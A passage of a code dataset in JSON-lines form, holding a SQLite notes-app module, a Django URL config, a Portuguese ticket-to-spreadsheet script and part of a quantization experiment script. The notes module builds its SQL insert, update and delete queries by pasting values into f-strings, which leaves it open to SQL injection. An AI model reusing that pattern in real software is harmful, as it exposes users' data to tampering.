Notes (\" \\\n \"note_id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\" \\\n \"note_category integer,\" \\\n \"note_title text NOT NULL,\" \\\n \"note_text text,\" \\\n \"creation_date text NOT NULL,\" \\\n \"FOREIGN KEY (note_category) REFERENCES Categories(category_id)\" \\\n \")\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef get_all_notes() -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"select * from Notes\"\n\n script.execute(sql_query)\n requests = script.fetchall()\n\n script.close()\n db.close()\n return requests\n\n\ndef get_filtered_notes(category: int) -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"select * from Notes where note_category = {category}\"\n\n script.execute(sql_query)\n requests = script.fetchall()\n\n script.close()\n db.close()\n return requests\n\n\ndef add_note(**kwargs) -> int:\n note_category = kwargs[\"note_category\"]\n note_title = kwargs[\"note_title\"]\n note_text = kwargs[\"note_text\"]\n creation_date = kwargs[\"creation_date\"]\n\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"insert into Notes (note_category, note_title, note_text, creation_date)\" \\\n f\"values ({note_category[0]}, \\\"{note_title}\\\", \\\"{note_text}\\\", \\\"{creation_date}\\\")\"\n script.execute(sql_query)\n note_id = script.lastrowid\n\n db.commit()\n script.close()\n db.close()\n return note_id\n\n\ndef save_note(note_id: int, note_title: str, note_text: str, category_id: int, creation_date: datetime) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"update Notes \" \\\n f\"set note_category = {category_id}, note_title = \\\"{note_title}\\\", note_text = \\\"{note_text}\\\",\" \\\n f\" creation_date = \\\"{creation_date}\\\" \" \\\n f\"where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef delete_note(note_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"delete from Notes where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef sort_notes(notes_info: list, sort_mode: tuple | None = None):\n sort_by, sort_type = sort_mode[0].lower(), sort_mode[1]\n sorted_list = None\n\n if sort_by == \"category\":\n category_map = get_categories()\n category_map = {k: v for k, v in category_map}\n sorted_list = sorted(notes_info, key=lambda x: category_map.get(x[1], \"\"))\n elif sort_by == \"note title\":\n sorted_list = sorted(notes_info, key=lambda x: x[2])\n elif sort_by == \"modified date\":\n sorted_list = sorted(notes_info, key=lambda x: x[-1])\n\n if sort_type == \"desc\":\n sorted_list.reverse()\n\n return sorted_list\n\n\ndef get_categories() -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"select * from Categories\"\n script.execute(sql_query)\n requests = script.fetchall()\n\n script.close()\n db.close()\n return requests\n\n\ndef change_note_category(category_id: int, note_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"update Notes \" \\\n f\"set note_category = {category_id} \" \\\n f\"where note_id = {note_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef create_category(category_name: str) -> tuple:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"insert into Categories (category_name) values (\\\"{category_name}\\\")\"\n script.execute(sql_query)\n category_id = script.lastrowid\n category_info = (category_id, category_name)\n\n db.commit()\n script.close()\n db.close()\n return category_info\n\n\ndef delete_category(category_id: int) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = f\"delete from Categories where category_id = {category_id}\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef export_to_json(app_version: str, filename: str) -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n notes_list: list[dict] = []\n all_notes: list = get_all_notes()\n for note in all_notes:\n note_dict = {\n \"note_id\": note[0],\n \"note_category\": note[1],\n \"note_title\": note[2],\n \"note_text\": note[3],\n \"creation_date\": note[4],\n }\n notes_list.append(note_dict)\n\n categories_list: list[dict] = []\n all_categories: list = get_categories()\n for category in all_categories:\n category_dict = {\n \"category_id\": category[0],\n \"category_name\": category[1]\n }\n categories_list.append(category_dict)\n\n file_directory = filename + \".json\"\n with open(file_directory, \"w\") as export_file:\n values: dict = {\n \"AppVersion\": app_version,\n \"Notes\": notes_list,\n \"Categories\": categories_list\n }\n json.dump(values, export_file)\n\n script.close()\n db.close()\n\n\ndef import_from_json(file_name: str, app_version: str) -> bool:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n with open(file_name, \"r\") as file:\n import_file: dict = json.load(file)\n if not import_file.get(\"AppVersion\") == app_version:\n messagebox.showwarning(\"Import failed\", \"The provided json file is not supported in this version. \"\n \"To prevent any issue, importing will not continue :)\")\n return False\n\n if not os.path.exists(\"notes.db\"):\n initialize_database()\n\n current_categories: list = get_categories()\n current_categories: list = [category[1].lower() for category in current_categories]\n imported_categories: list[dict] = import_file[\"Categories\"]\n\n for imported_category in imported_categories:\n category_name = imported_category[\"category_name\"]\n if not (category_name.lower() in current_categories):\n create_category(category_name)\n\n imported_notes: list = import_file[\"Notes\"]\n all_categories: list = get_categories()\n\n for imported_note in imported_notes:\n title = imported_note[\"note_title\"]\n text = imported_note[\"note_text\"]\n date = imported_note[\"creation_date\"]\n category_name = \"None\"\n category_id = (0, \"None\")\n\n # This loop takes the category name of the imported note based on the backed up Categories for synchronization\n for imported_category in imported_categories:\n if imported_category[\"category_id\"] == imported_note[\"note_category\"]:\n category_name = imported_category[\"category_name\"]\n\n # This loop takes the category id of the category name from the current categories in the app\n for category in all_categories:\n if category[1].lower() == category_name.lower():\n category_id = category\n\n add_note(note_category=category_id, note_title=title, note_text=text, creation_date=date)\n\n db.commit()\n script.close()\n db.close()\n return True\n\n\nif __name__ == \"__main__\":\n pass\n # notes = get_all_notes()\n # for note in notes:\n # print(f\"Title: {note[2].ljust(20)} | Text: {note[3]}\")\n\n # delete_note(2)\n # print(\"Deleted\")\n # notes = get_all_notes()\n # for note in notes:\n # print(f\"Title: {note[2].ljust(20)} | Text: {note[3]}\")\n\n # categories = get_categories()\n # print(categories)\n\n # export_to_json(\"1.0.0\")\n # import_from_json(\"notes_exported.json\", \"1.0.0\")\n\n print(f\"Unsorted: {get_all_notes()}\")\n print(f'Sorted: {sort_notes(get_all_notes(), (\"modified date\", \"asc\"))}')","repo_name":"rikkadesu/noteplusone","sub_path":"notes_database.py","file_name":"notes_database.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5555682489","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"home\", views.home, name=\"home\"),\n path(\"request_book/\", views.request_book, name=\"request_book\"),\n path(\n \"request_book//\", views.request_book, name=\"request_book_specific\"\n ),\n path(\"request_new_book/\", views.request_new_book, name=\"request_new_book\"),\n path(\"librarian_dashboard/\", views.librarian_dashboard, name=\"librarian_dashboard\"),\n path(\"add_book/\", views.add_book, name=\"add_book\"),\n path(\n \"approve_request//\",\n views.approve_request,\n name=\"approve_request\",\n ),\n path(\"assigned_books/\", views.assigned_books, name=\"assigned_books\"),\n path(\n \"revoke_assignment//\",\n views.revoke_assignment,\n name=\"revoke_assignment\",\n ),\n path(\n \"view_book_details//\",\n views.view_book_details,\n name=\"view_book_details\",\n ),\n path(\"logout/\", views.logout_view, name=\"logout\"),\n]\n","repo_name":"ratna1308/Library_management_systems","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34053582839","text":"import pandas as pd \nfrom datetime import time\nimport pandas as pd\nfrom openpyxl import load_workbook\nfrom descricao_tra import define_descricao\n\nestados_regioes = {\n 'AC': 'Norte',\n 'AL': 'Nordeste',\n 'AP': 'Norte',\n 'AM': 'Norte',\n 'BA': 'Nordeste',\n 'CE': 'Nordeste',\n 'DF': 'Centro-Oeste',\n 'ES': 'Sudeste',\n 'GO': 'Centro-Oeste',\n 'MA': 'Nordeste',\n 'MT': 'Centro-Oeste',\n 'MS': 'Centro-Oeste',\n 'MG': 'Sudeste',\n 'PA': 'Norte',\n 'PB': 'Nordeste',\n 'PR': 'Sul',\n 'PE': 'Nordeste',\n 'PI': 'Nordeste',\n 'RJ': 'Sudeste',\n 'RN': 'Nordeste',\n 'RS': 'Sul',\n 'RO': 'Norte',\n 'RR': 'Norte',\n 'SC': 'Sul',\n 'SP': 'Sudeste',\n 'SE': 'Nordeste',\n 'TO': 'Norte'\n}\n\nlider = {\n 'DF': 'Gutemberg',\n 'GO': 'Gutemberg',\n 'MT': 'Gutemberg',\n 'MS': 'Gutemberg',\n 'AL': 'Saulo',\n 'BA': 'Douglas',\n 'CE': 'Douglas',\n 'MA': 'Erivaldo',\n 'PB': 'Saulo',\n 'PE': 'Saulo',\n 'PI': 'Luiz Bolzon',\n 'RN': 'Saulo',\n 'SE': 'Saulo',\n 'AC': 'Erivaldo',\n 'AP': 'Erivaldo',\n 'AM': 'Erivaldo',\n 'PA': 'Luiz Bolzon',\n 'RO': 'Erivaldo',\n 'RR': 'Erivaldo',\n 'TO': 'Luiz Bolzon',\n 'ES': 'Dolôr',\n 'MG': 'Dolôr',\n 'RJ': 'Dolôr',\n 'SP': 'Elesandro',\n 'PR': 'Sérgio Mukai',\n 'RS': 'Sérgio Mukai',\n 'SC': 'Sérgio Mukai'\n}\n\ncausa_dicionario = {\n 'Compressor': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da evaporadora ': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da evaporadora': 'Infraestrutura - Sistema de Climatização',\n 'FAN-10': 'Infraestrutura - Sistema de Climatização',\n 'Módulo de expansão 2157': 'Infraestrutura - Sistema de Climatização',\n 'Transformador 220 - 24 ': 'Infraestrutura - Sistema de Climatização',\n 'AGST - MP5000 M00 08000004P': 'Infraestrutura - Sistema de Climatização',\n 'Válvula de expansão': 'Infraestrutura - Sistema de Climatização',\n 'Ventilador da condensadora ': 'Infraestrutura - Sistema de Climatização',\n ': ZIEHL - Modelo: ZEIHL ABEGG': 'Infraestrutura - Sistema de Climatização',\n 'PLC SANRIO': 'Infraestrutura - Sistema de Climatização',\n 'Módulo AGST - MP5000 M02 00080800': 'Infraestrutura - Sistema de Climatização',\n 'Placa de circuito interno do Ar-condicionado SANRIO': 'Infraestrutura - Sistema de Climatização',\n 'Tubulação de gás para ar-condicionado.': 'Infraestrutura - Sistema de Climatização',\n 'AGST - MP5000 M00 08000004P': 'Infraestrutura - Sistema de Climatização',\n '8 unidade Bateria Sec Power HMA-12 110/12V 110Ah - SEC POWER': 'Infraestrutura - Sistema de Climatização',\n 'Ziehl Abegg 113237 230vts // 60h // 15a/ 40ac': 'Infraestrutura - Sistema de Climatização',\n '4 Ventiladores Ziel ': 'Infraestrutura - Sistema de Climatização',\n 'Controladora PCIR-04': 'Infraestrutura - Sistema de Climatização',\n 'Reposição de gás': 'Infraestrutura - Sistema de Climatização',\n 'Controladora PCIR-04': 'Infraestrutura - Sistema de Climatização',\n 'Falha na tubulação do AC4': 'Infraestrutura - Sistema de Climatização',\n 'Controladora TIC-17 e MF6': 'Infraestrutura - Sistema de Climatização',\n 'Controladora TCIR04': 'Infraestrutura - Sistema de Climatização',\n 'Falha na tubulação do AC1': 'Infraestrutura - Sistema de Climatização',\n 'PLC - TCIR04': 'Infraestrutura - Sistema de Climatização',\n 'SSC10 BBAA': 'Infraestrutura - Sistema de Climatização',\n 'Máquina de ar-condicionado': 'Infraestrutura - Sistema de Climatização',\n 'PLC SANRIO PCIR03G': 'Infraestrutura - Sistema de Climatização',\n 'Tampa da caixa R1': 'Infraestrutura - Sistema Retificador FCC',\n 'Kit Ventilado': 'Infraestrutura - Sistema Retificador FCC',\n 'Placa OMPI': 'Infraestrutura - Sistema Retificador FCC',\n 'RAU2X6U/A26R6AUKL40179/A26': 'Rádio - Equipamento Ericsson',\n 'RAU2x7/A15Ericsson': 'Rádio - Equipamento Ericsson',\n 'NPU 3C': 'Rádio - Equipamento Ericsson',\n 'NPU3 C ROJR 211 006/2 R2A': 'Rádio - Equipamento Ericsson',\n 'DVR/Câmeras/Fonte12V': 'Infraestrutura - Sistema de CFTV',\n 'NVR-2 camera 22': 'Infraestrutura - Sistema de CFTV',\n 'NVR': 'Infraestrutura - Sistema de CFTV',\n 'KoDo PRO - Modelo: KCX-5700N': 'Infraestrutura - Sistema de CFTV',\n ': Isotrafo - Modelo: 45KVA - 13,8 KV': 'Infraestrutura - Sistema de CFTV',\n 'HIK VISION - Modelo: DS-2CD2120F-IS': 'Infraestrutura - Sistema de CFTV',\n 'MCE - Modelo: 300W': 'Infraestrutura - Sistema de CFTV',\n 'Cabos para CFTV': 'Infraestrutura - Sistema de CFTV',\n 'SPVL-4': 'DWDM - Equipamento PADTEC',\n 'SPVL-4SM': 'DWDM - Equipamento PADTEC',\n \"2 Supervisores SMARTPACWEB / SNMP6 UR's 50A FLATPAC21 SPVL-901 Base para DPS3 BANDEJAS para RETIFICADORES FCC ELTEK\": 'DWDM - Equipamento PADTEC',\n 'SPVL-90': 'DWDM - Equipamento PADTEC',\n 'Subbastidor 14uTM400# sobressalente OCM com defeito SPVL-91# com defeito SSC sobressalente': 'DWDM - Equipamento PADTEC',\n 'SPVL 90': 'DWDM - Equipamento PADTEC',\n 'SPVL-91 ': 'DWDM - Equipamento PADTEC',\n 'T100DCT-4JRT2L':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JRT2L\t':'DWDM - Equipamento PADTEC',\n 'TR400C93-QBF-QBF':'DWDM - Equipamento PADTEC',\n 'T100DCT-4PTT2L': 'DWDM - Equipamento PADTEC',\n 'SSC-BBAA - FAN 10':'DWDM - Equipamento PADTEC',\n 'TM400C92QBFXHACA':'DWDM - Equipamento PADTEC',\n 'TM400C92-DBF-XHF-CA.':'DWDM - Equipamento PADTEC',\n 'TM400-9B':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JT2L':'DWDM - Equipamento PADTEC',\n 'TM400C92-DBF-XHF-CA':'DWDM - Equipamento PADTEC',\n 'TR400-9B':'DWDM - Equipamento PADTEC',\n 'LOA4C211AYAHA':'DWDM - Equipamento PADTEC',\n 'SCME-4DP e CVA-4SRA':'DWDM - Equipamento PADTEC',\n '- SPVL-4SM':'DWDM - Equipamento PADTEC',\n 'FAN-G8':'DWDM - Equipamento PADTEC',\n 'SCMD3S1A':'DWDM - Equipamento PADTEC',\n 'T100DCT-4JTMYL':'DWDM - Equipamento PADTEC',\n '- Sobressalente necessário: Placa SSC-AAAA ':'DWDM - Equipamento PADTEC',\n 'CVA-4SRA':'DWDM - Equipamento PADTEC',\n 'Amplificador Óptico de Linha - LOAP14B244AA':'DWDM - Equipamento PADTEC',\n ': SCME-4DP':'DWDM - Equipamento PADTEC',\n 'VOAB-2A16AA':'DWDM - Equipamento PADTEC',\n '- Modelo: VOAB-2A16AA':'DWDM - Equipamento PADTEC',\n 'MDSADC21401ST3':'DWDM - Equipamento PADTEC',\n 'BOA4C241BDAHA':'DWDM - Equipamento PADTEC',\n '3x XFP 10G Base-LR/LW 1310nm':'DWDM - Equipamento PADTEC',\n 'LightPad i1600G - Canal de Voz - CVA-4SRA':'DWDM - Equipamento PADTEC',\n 'POA4C141AHAH':'DWDM - Equipamento PADTEC',\n 'PADTEC - LOAP14B244AA#268':'DWDM - Equipamento PADTEC',\n 'TR400-9B#':'DWDM - Equipamento PADTEC',\n 'CVA-4SSA':'DWDM - Equipamento PADTEC',\n 'TCX11-4P-A1#':'DWDM - Equipamento PADTEC',\n 'SFP 10 Gb Modelo: 1200-SM-LL-L': 'IP - Equipamento Datacom',\n 'DM4000 - MPU512 ': 'IP - Equipamento Datacom',\n '1KVA NB HDS LM S2': 'Infraestrutura - Nobreak',\n 'QCAB': 'Infraestrutura - Balizamento de Torre',\n 'Bomba injetora do GMG ': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria MARCA - DISBAL ; MODELO - S 150MD': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria de GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'Gerador completo': 'Infraestrutura - Grupo Motor Gerador',\n 'bateria do gerador Optima - Modelo: Gel - Red Top 35 / 12 volts - 44ha - 720a (-18Cº) 910a 0Cº - RC90min': 'Infraestrutura - Grupo Motor Gerador',\n 'DEEP SEA MODELO:DSE-7320': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria para o GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'USCA - AJX TELECOM - AP Control GMG 7320 8-36 VCC': 'Infraestrutura - Grupo Motor Gerador',\n 'USCA CUNNINS': 'Infraestrutura - Grupo Motor Gerador',\n 'Retificaro GMG': 'Infraestrutura - Grupo Motor Gerador',\n 'Contactora Stemac EK370': 'Infraestrutura - Grupo Motor Gerador',\n 'Bateria ': 'Infraestrutura - Grupo Motor Gerador',\n 'Estemac MWMD229': 'Infraestrutura - Grupo Motor Gerador',\n 'Fonte da Telemetria Siemens': 'Infraestrutura - Sistema de Alarmes',\n 'FTLB in 48V / out 24 V': 'Infraestrutura - Sistema de Alarmes',\n 'OM-SMR100BR-TM-N': 'Infraestrutura - Sistema Retificador FCC',\n ': Emerson - Modelo: R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'UR 37A/48Vcc/412 Modelo OM - 1S37': 'Infraestrutura - Sistema Retificador FCC',\n 'EMERSON - Modelo: R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'EMERSON R48 - 3200': 'Infraestrutura - Sistema Retificador FCC',\n 'R48-3200': 'Infraestrutura - Sistema Retificador FCC',\n 'Omibra OM1S50N': 'Infraestrutura - Sistema Retificador FCC',\n 'FLATPAC 2 - 3kW': 'Infraestrutura - Sistema Retificador FCC',\n 'OM-SMR100BR-TM-N': 'Infraestrutura - Sistema Retificador FCC',\n 'Novus - RHT Modelo: RHT-WM Transmitter': 'Infraestrutura - Sistema Retificador FCC',\n 'FLATPACK 2 3000W 5A/-48V/4.1.2 - PN 241119.903': 'Infraestrutura - Sistema Retificador FCC',\n 'Aguilera - AE/PX2-F': 'Infraestrutura - Sistema Retificador FCC',\n 'UR 37A/48Vcc': 'Infraestrutura - Sistema Retificador FCC',\n 'FTLB 4824 S': 'Infraestrutura - Sistema Retificador FCC',\n 'Duas unidades SCMD3S1A#': 'Infraestrutura - Sistema Retificador FCC',\n 'Bateria Estacionaria Freedom DF2000 115Ah': 'Infraestrutura - Banco de Baterias',\n 'DELTA - Modelo: GES161B1057000-N': 'Infraestrutura - Banco de Baterias',\n 'SECPower - Modelo: HMA110': 'Infraestrutura - Banco de Baterias',\n 'TecPower - Modelo: HNA 12/110': 'Infraestrutura - Banco de Baterias',\n 'Modelo: pig-tail de alta E2000 / cordão óptico SC/APC E2000/APC': 'Outros',\n 'Cordões com conector E2000': 'Outros',\n 'Cordão óptico': 'Outros',\n 'MCE - Modelo: 300W': 'Outros',\n 'ODU 8giga hertz ': 'Rádio - Equipamento Digitel',\n 'Radio IDU ': 'Rádio - Equipamento Digitel'\n}\n\narquivo = \"Lista_modelos_bilhete.xls\"\narquivo2 = \"Base VDS.xlsx\"\nabertura_data = []\nabertura_hora = []\nabertura_mes = []\ntermino_data = []\ntermino_hora = []\ntermino_mes = []\nestacao = []\ndescricao = []\nuf = []\nregiao = []\ntipo_site = []\nlider_regiao = []\ncategoria = []\nsubcategoria = []\nprioridade = []\ncausa = []\n\ndef dividi_data(data_entrada, array_data, array_hora, array_mes):\n if data_entrada == '-':\n array_data.append('-')\n array_hora.append('')\n array_mes.append('-')\n else:\n data_dia, hora = map(str, data_entrada.split(' '))\n h, m ,s = map(int, hora.split(':'))\n array_data.append(data_dia)\n array_hora.append(time(h, m, s))\n array_mes.append(mes_ano(data_dia))\n\ndef mes_ano(data_entrada):\n meses = {\n '01': 'janeiro',\n '02': 'fevereiro',\n '03': 'março',\n '04': 'abril',\n '05': 'maio',\n '06': 'junho',\n '07': 'julho',\n '08': 'agosto',\n '09': 'setembro',\n '10': 'outubro',\n '11': 'novembro',\n '12': 'dezembro'\n }\n mes = data_entrada[3:5]\n ano = data_entrada[8:10]\n return f'{meses.get(mes)}-{ano}'\n\ndef estacao_id(entrada, entrada_2):\n if isinstance(entrada, float):\n estacao.append(entrada_2.lstrip()[0:11])\n descricao.append(define_descricao(entrada_2.lstrip()[0:11]))\n else:\n estacao.append(entrada)\n descricao.append(define_descricao(entrada))\n\ndef estacao_info(estacao_entrada):\n uf.append(estacao_entrada[0:2])\n regiao.append(estados_regioes.get(estacao_entrada[0:2]))\n tipo_site.append(estacao_entrada[6:8])\n lider_regiao.append(lider.get(estacao_entrada[0:2]))\n\ndef define_categoria(entrada, entrada_cat, entrada_sub):\n if isinstance(entrada, float) or entrada == None:\n if(entrada_cat, float) or entrada_cat == None:\n categoria.append('')\n subcategoria.append('')\n else:\n categoria.append(entrada_cat)\n subcategoria.append(entrada_sub)\n elif str(entrada) == 'Cancelado':\n categoria.append('Cancelado')\n subcategoria.append('Cancelado')\n elif str(entrada) == 'Outros' or str(entrada) == 'outros' or str(entrada) == 'Outro' or str(entrada) == 'outro':\n categoria.append('Outros')\n subcategoria.append('Outros')\n elif ' - ' in entrada:\n cat, sub = map(str, entrada.split(' - '))\n categoria.append(cat)\n subcategoria.append(sub)\n else:\n categoria.append('')\n subcategoria.append('')\n\ndef define_prioridade(entrada):\n if isinstance(entrada, float):\n prioridade.append('Baixa')\n else:\n prioridade.append(entrada)\n\ndef define_causa(entrada, entrada2, entrada_base, entrada_nome):\n if '-' in str(entrada):\n causa.append(entrada)\n elif entrada_base == 'Cancelado':\n causa.append('Cancelado')\n else:\n entrada_tratada = str(entrada2).lstrip()\n entrada_tratada = entrada_tratada.upper()\n if 'RETIFICADOR' in entrada_tratada or 'ELTEK' in entrada_tratada or 'EMERSON' in entrada_tratada or 'OMIBRA' in entrada_tratada or '(FONTEOMIBRA)' in entrada_tratada or '(FONTEDELTA)' in entrada_tratada or 'SSC-10' in entrada_tratada or 'ROA4C301AWAHA' in entrada_tratada:\n causa.append('Infraestrutura - Sistema Retificador FCC')\n elif 'TSDA' in entrada_tratada or 'TELEMETRIA' in entrada_tratada or 'SIEMENS' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Alarmes')\n elif 'INVERSOR' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Inversores')\n elif 'NOBREAK' in entrada_tratada or 'NDHBSLM72' in entrada_tratada:\n causa.append('Infraestrutura - Nobreak')\n elif 'BATERIAS' in entrada_tratada:\n causa.append('Infraestrutura - Banco de Baterias')\n elif 'RAU' in entrada_tratada or 'RAU2' in entrada_tratada or 'ERICSSON' in entrada_tratada:\n causa.append('Rádio - Equipamento Ericsson')\n elif 'DIGITEL' in entrada_tratada or 'DSR – ODU' in entrada_tratada:\n causa.append('Rádio - Equipamento Digitel')\n elif 'MOTOR' in entrada_tratada and ('MWM' in entrada_tratada or 'MWM-D-229-4' in entrada_tratada or 'GERADOR' in entrada_tratada) or entrada_tratada == 'BATERIA' or 'GMG' in entrada_tratada:\n causa.append('Infraestrutura - Grupo Motor Gerador')\n elif 'KIT VENTILADOR' in entrada_tratada or 'KIT DE VENTILADOR' in entrada_tratada or 'COMPRESSOR' in entrada_tratada or 'COMPRESSOR.' in entrada_tratada or 'COMPRESSO' in entrada_tratada or 'FAN' in entrada_tratada:\n causa.append('Infraestrutura - Sistema de Climatização')\n elif 'HD' in entrada_tratada or 'DVR' in entrada_tratada or 'INTELBRAS' in entrada_tratada or 'SEAGATE' in entrada_tratada or 'CÂMERA' in str(entrada2).upper() or 'CAMERA' in str(entrada2).upper():\n causa.append('Infraestrutura - Sistema de CFTV')\n elif 'CISCO' in entrada_tratada:\n causa.append('IP - Equipamento Cisco')\n elif 'DATACOM' in entrada_tratada or 'DM4001' in entrada_tratada:\n causa.append('IP - Equipamento Datacom')\n elif 'HUAWEI' in entrada_tratada or 'AR1220EV' in entrada_tratada or 'AR2200E' in entrada_tratada:\n causa.append('IP - Equipamento Huawei')\n elif 'HP' in entrada_tratada:\n causa.append('IP - Equipamento HP')\n elif 'CPE' in entrada_tratada:\n causa.append('IP - Equipamento CPE')\n elif str(entrada_base) != 'nan':\n causa.append(str(entrada_base))\n else:\n if 'PADTEC' in str(entrada_nome).upper():\n causa.append('DWDM - Equipamento PADTEC')\n elif 'CLIMATIZAÇÃO' in str(entrada_nome).upper() or 'AR-CONDICIONADO' in str(entrada_nome).upper() or 'AR CONDICIONADO' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de Climatização')\n elif 'CFTV' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de CFTV')\n elif 'MOTOR' in str(entrada_nome).upper() or 'BATERIA' in str(entrada_nome).upper() or 'GERADOR' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Grupo Motor Gerador')\n elif 'ERICSSON' in str(entrada_nome).upper():\n causa.append('Rádio - Equipamento Ericsson')\n elif 'DIGITEL' in str(entrada_nome).upper():\n causa.append('Rádio - Equipamento Digitel')\n elif 'ALARMES' in str(entrada_nome).upper() or 'SIEMENS' in str(entrada_nome).upper() or 'TELEMETRIA' in str(entrada_nome).upper():\n causa.append('Infraestrutura - Sistema de Alarmes')\n else:\n causa.append(causa_dicionario.get(str(entrada2).lstrip()))\n\narquivo_pd = pd.read_excel(arquivo)\nbase_pd = pd.read_excel(arquivo2)\n\nfor index, row in arquivo_pd.iterrows():\n dividi_data(row['Data abertura'], abertura_data, abertura_hora, abertura_mes)\n dividi_data(row['Término'], termino_data, termino_hora, termino_mes)\n estacao_id(row['Id da Estação'], row['Nome'])\n estacao_info(estacao[index])\n if row['Estado'] == 'Cancelado':\n define_causa(row['Causa do alerta'], row['Sobressalente a ser verificado'], 'Cancelado', row['Nome'])\n define_categoria(causa[index], base_pd['Categoria'][index], base_pd['Subcategoria'][index])\n if isinstance(row['Sobressalente a ser verificado'], float):\n row['Sobressalente a ser verificado'] = 'Cancelado'\n elif index < base_pd.shape[0]:\n define_causa(row['Causa do alerta'], row['Sobressalente a ser verificado'], base_pd['Causa do alerta'][index], row['Nome'])\n define_categoria(causa[index], base_pd['Categoria'][index], base_pd['Subcategoria'][index])\n else:\n define_causa(row['Causa do alerta'], row['Sobressalente a ser verificado'], '', row['Nome'])\n define_categoria(causa[index], '', '')\n define_prioridade(row['Nível de prioridade da VDS'])\n \ndf = {\n 'Id ordem serviço': arquivo_pd['Id ordem serviço'],\n 'Nome': arquivo_pd['Nome'],\n 'Estado': arquivo_pd['Estado'],\n 'Data abertura': abertura_data,\n 'Hora Abertura': abertura_hora,\n 'Mês abertura': abertura_mes,\n 'Término': termino_data,\n 'Hora Término': termino_hora,\n 'Mês término': termino_mes,\n 'Data ultima transição': arquivo_pd['Data ultima transição'],\n 'Estação': estacao,\n 'Descrição': descricao,\n 'UF': uf,\n 'Região': regiao,\n 'Tipo Site': tipo_site,\n 'Líder de Campo': lider_regiao,\n 'Sobressalente a ser verificado': arquivo_pd['Sobressalente a ser verificado'],\n 'Nível de prioridade da VDS': prioridade,\n 'Causa do alerta': causa,\n 'Categoria': categoria,\n 'Subcategoria': subcategoria\n}\n\npd_df = pd.DataFrame(df)\n\nprint(base_pd)\n\nwith pd.ExcelWriter('saida.xlsx', engine='xlsxwriter') as writer:\n pd_df.to_excel(writer, sheet_name='BaseVDS', index=False)\n \n workbook = writer.book\n worksheet = writer.sheets['BaseVDS']\n \n header_format = workbook.add_format({\n 'bold': True,\n 'text_wrap': True,\n 'valign': 'top',\n 'fg_color': '#002060',\n 'font_color': '#FFFFFF',\n 'border': 1\n })\n\n worksheet.autofilter(0, 0, 0, len(pd_df.columns) - 1)\n\n center_format = workbook.add_format({'align': 'center'})\n\n #worksheet.set_column(0, len(pd_df.columns) - 1, cell_format=center_format)\n\n for col_num, value in enumerate(pd_df.columns.values):\n worksheet.write(0, col_num, value, header_format)\n\nbook = load_workbook('saida.xlsx')\nsheet = book['BaseVDS']\n\nfor col in sheet.columns:\n max_length = 0\n column = col[0].column_letter\n for cell in col:\n if len(str(cell.value)) > max_length:\n max_length = len(str(cell.value))\n adjusted_width = (max_length + 2)\n sheet.column_dimensions[column].width = adjusted_width\n\nbook.save('saida.xlsx')","repo_name":"danilow200/VDS","sub_path":"atualiza_planilha.py","file_name":"atualiza_planilha.py","file_ext":"py","file_size_in_byte":19923,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17289053713","text":"from quantizers import AqQuantizer,PqQuantizer\nfrom methodParams import MethodParams\nfrom dataParams import DataParams\nfrom getRecall import getRecallAt\nfrom newIO import ivecs_read\n\n# parameters\n## Set number of codebook M and codewards for each codebook K\nparamSets = []\nparamSets.append(MethodParams(M=4, K=256))\n\n# datasets\n## Set dataset to be used\ndatasets = []\n# datasets.append(DataParams('siftsmall'))\ndatasets.append(DataParams('sift1M'))\n# datasets.append(DataParams('gist1M'))\n\n# methods\nquantizers = []\n# quantizers.append(AqQuantizer(threadsCount=20, itCount=20))\n# quantizers.append(PqQuantizer(threadsCount=20, itCount=30))\n\ntrainCodebooks = True\nencodeDatasets = False\n\nif trainCodebooks:\n for params in paramSets:\n for data in datasets:\n for method in quantizers:\n method.trainCodebooks(data, params)\n print(f'Codebooks for settings {data.prefix}{method.prefix}{params.prefix} are learned')\n\nif encodeDatasets:\n for params in paramSets:\n for data in datasets:\n for method in quantizers:\n method.encodeDataset(data, params)\n print(f'Dataset for settings 